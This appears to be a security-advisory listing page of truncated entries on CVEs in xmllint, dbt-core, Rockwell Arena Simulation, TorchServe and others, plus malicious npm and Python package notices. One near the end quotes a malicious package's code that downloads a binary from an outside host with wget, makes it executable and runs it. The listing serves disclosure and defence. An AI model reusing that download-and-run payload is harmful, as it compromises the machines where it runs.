Malicious Package
Overview chime-core-utils is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
CVE-2025-6170
A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare...
CVE-2024-40637
dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...
Code Injection
dbt-core is vulnerable to Code Injection. The vulnerability is due to the ability of packages to override macros, materializations, and other core components of dbt, which can allow attackers to inject harmful code...
CVE-2024-40637
dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...
PYSEC-2024-66
dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...
CVE-2024-40637
CVE-2024-40637 affects dbt-core where installing a package can override macros, materializations, and other core components, potentially allowing malicious packages to inject harmful code. Root cause: implicit override of built-in materializations from installed packages. Impact is described as h...
CVE-2024-40637 Implicit override for built-in materializations from installed packages in dbt-core
dbt enables data analysts and engineers to transform their data using the same practices that software engineers use to build applications. When a user installs a package in dbt, it has the ability to override macros, materializations, and other core components of dbt. This is by design, as it...
CVE-2024-2929
Summary: CVE-2024-2929 concerns Rockwell Automation Arena Simulation software with memory corruption flaws due to buffer-related issues that can lead to unauthorized code execution if a user opens a malicious file. The vulnerability family includes multiple memory-corruption variants (out-of-boun...
CVE-2024-21919 Rockwell Automation Arena Simulation Vulnerable To Uninitialized Pointer
An uninitialized pointer in Rockwell Automation Arena Simulation software could potentially allow a malicious user to insert unauthorized code into the software by leveraging the pointer after it is properly. Once inside, the threat actor can run harmful code on the system. This affects the...
CVE-2024-21919
The CVE-2024-21919 entry concerns Rockwell Automation Arena Simulation Software with an uninitialized pointer access vulnerability. Affected product: Arena Simulation Software (version 16.00 listed; later patch 16.20.03 is recommended). Root cause: uninitialized pointer accessible during operatio...
CVE-2024-21913
Summary: Rockwell Automation Arena Simulation Software is affected by a heap-based memory buffer overflow vulnerability (CWE-122) that can allow a malicious user to run arbitrary code by overstepping memory boundaries, triggered by opening a malicious file. Affected product: Arena Simulation Soft...
CVE-2024-21912 Rockwell Automation Arena Simulation vulnerable to out of bounds write
An arbitrary code execution vulnerability in Rockwell Automation Arena Simulation could let a malicious user insert unauthorized code into the software. This is done by writing beyond the designated memory area, which causes an access violation. Once inside, the threat actor can run harmful code ...
GHSA-M2MJ-PR4F-H9JP TorchServe ZipSlip
Impact Using the model/workflow management API, there is a chance of uploading potentially harmful archives that contain files that are extracted to any location on the filesystem that is within the process permissions. Leveraging this issue could aid third-party actors in hiding harmful code in...
Multiple Self-XSS Vulnerabilities
Description: Multiple Self-XSS vulnerabilities are triggered at multiple endpoints. http://localhost:8083/edit/server/ There is a bug in the web/templates/pages/editserver.php file. An attacker can control $vtimezone. php ', theme: '', language: '', hasSmtpRelay: , remoteBackupEnabled: , backupType: '',...
Malicious code in as-ui-deals (npm)
Source: ghsa-malware 59a46a45592f6c5043e6aa80e3fca0f987b6fad0cd0078499ea75823075847c1 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Potential SHA256 Digest Vulnerability in Solidity Contract
Vulnerability details: Impact: This vulnerability enables an attacker to pass malicious data to the "verify" function, which in turn uses that data as input for the sha256 function; this can lead to unexpected or incorrect output, potentially resulting in unauthorized access to...
Malicious Package
Overview test-packages-bad is a malicious package. This package downloads and runs malicious code on the victim host. Malicious Code python import os os.system"wget https://dark.devsecwise.com/cronjob.out /dev/null 2&1" os.system"chmod +x /home/$he/.metasploit/cronjob.out" os.system"./cronjob.out...
CVE-2021-40336
A vulnerability exists in the HTTP web interface, where the web interface does not validate data in an HTTP header. This makes HTTP response splitting possible, which, if exploited, could allow an attacker to deliver harmful code into the user's web browser, for example to steal the session...